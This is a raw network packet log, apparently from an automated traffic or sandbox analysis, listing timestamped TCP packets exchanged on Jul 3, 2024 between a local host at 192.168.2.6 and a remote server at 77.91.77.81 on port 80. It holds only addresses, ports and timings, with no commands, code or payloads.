                                                                Jul 3, 2024 08:38:35.293304920 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293313980 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293349981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293349981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293428898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293442011 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293452978 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293464899 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293488026 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293561935 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293570042 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293642998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293648005 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293661118 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293672085 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293684006 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293701887 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293725967 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294194937 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294241905 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294254065 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294259071 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294303894 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294372082 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294384956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294395924 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294408083 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294425011 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294466972 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294466972 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294503927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294557095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294569016 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.294621944 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.294621944 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295068979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295125008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295145035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295156956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295202971 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295279026 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295290947 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295301914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295312881 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295322895 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295361042 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295382023 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.295397043 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.295479059 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.346935034 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.346959114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.346971035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347011089 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347042084 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347105026 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347116947 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347127914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347141027 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347181082 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347181082 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347378969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347390890 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347403049 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347414017 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347425938 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347436905 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347446918 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347446918 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347454071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347466946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347480059 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347491980 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347491980 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347523928 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347714901 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347784996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347794056 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347796917 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347827911 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347843885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.347918034 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347929955 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347942114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347951889 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347963095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.347986937 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.348002911 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.348157883 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.348169088 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.348180056 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.348191023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.348205090 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.348226070 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.348263979 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380143881 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380188942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380199909 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380237103 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380249977 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380260944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380278111 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380278111 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380296946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380321980 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380376101 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380388975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380431890 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380431890 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380453110 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380465984 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380477905 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380497932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380500078 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380513906 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380518913 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380557060 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380567074 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.380748987 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380762100 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.380803108 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414576054 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414598942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414613008 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414632082 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414644003 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414654970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414676905 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414705992 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414869070 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414881945 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414894104 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414905071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414932966 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414932966 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414954901 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414966106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.414974928 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.414977074 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415004015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415039062 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415045023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415056944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415069103 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415092945 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415092945 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415162086 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415184975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415246010 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415329933 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415383101 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415394068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415430069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415467024 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415596008 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415606976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415621042 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415632010 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415651083 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415704966 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415735006 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415771008 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415782928 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415813923 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415813923 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.415923119 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415934086 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415946007 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415956974 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415972948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.415978909 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416003942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416048050 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416454077 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416465044 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416476011 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416492939 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416505098 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416516066 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416527033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416538000 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416548967 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416559935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416594982 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416594982 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416742086 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416754007 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416764975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416779995 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416791916 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416796923 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416805029 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.416820049 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416831970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.416865110 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417150021 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417191982 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417202950 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417232037 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417232037 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417279005 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417339087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417351007 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417361975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417372942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417402983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417439938 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417537928 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417551994 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417603970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417738914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417749882 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417761087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417772055 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417778015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417783976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417797089 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417800903 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417809010 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417820930 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.417856932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.417856932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.418088913 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418104887 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418117046 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418128014 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418138981 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418139935 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.418150902 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.418157101 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.418171883 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.418236971 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435441971 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435453892 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435463905 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435499907 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435544014 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435573101 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435584068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435595989 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435606956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435626984 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435626984 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435715914 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435758114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435770035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435780048 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435791969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435834885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435834885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.435951948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435962915 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.435972929 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436005116 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436084986 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436106920 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436117887 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436127901 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436144114 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436145067 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436156034 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436161995 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436168909 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436180115 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436197042 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436204910 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436204910 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436232090 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436546087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436557055 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436567068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436575890 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436588049 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436598063 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.436599016 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436620951 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.436638117 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.468863010 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.468885899 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.468895912 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.468976021 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.468976021 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469007969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469018936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469029903 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469041109 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469067097 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469084024 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469278097 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469289064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469299078 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469310045 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469326019 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469336033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469336987 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469347954 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469357014 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469410896 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469580889 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469592094 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469603062 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469614029 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469624996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469639063 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469645023 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469645023 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469697952 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.469840050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.469954967 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503201962 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503216028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503268957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503279924 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503281116 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503279924 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503325939 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503325939 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503377914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503388882 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503462076 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503472090 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503484011 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503498077 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503546000 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503546000 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503571987 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503639936 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503648043 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503659964 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503705025 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503736019 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503747940 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503757954 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503789902 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503813028 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503844023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503865957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503886938 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503890991 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.503927946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.503927946 CEST4972580192.168.2.677.91.77.81
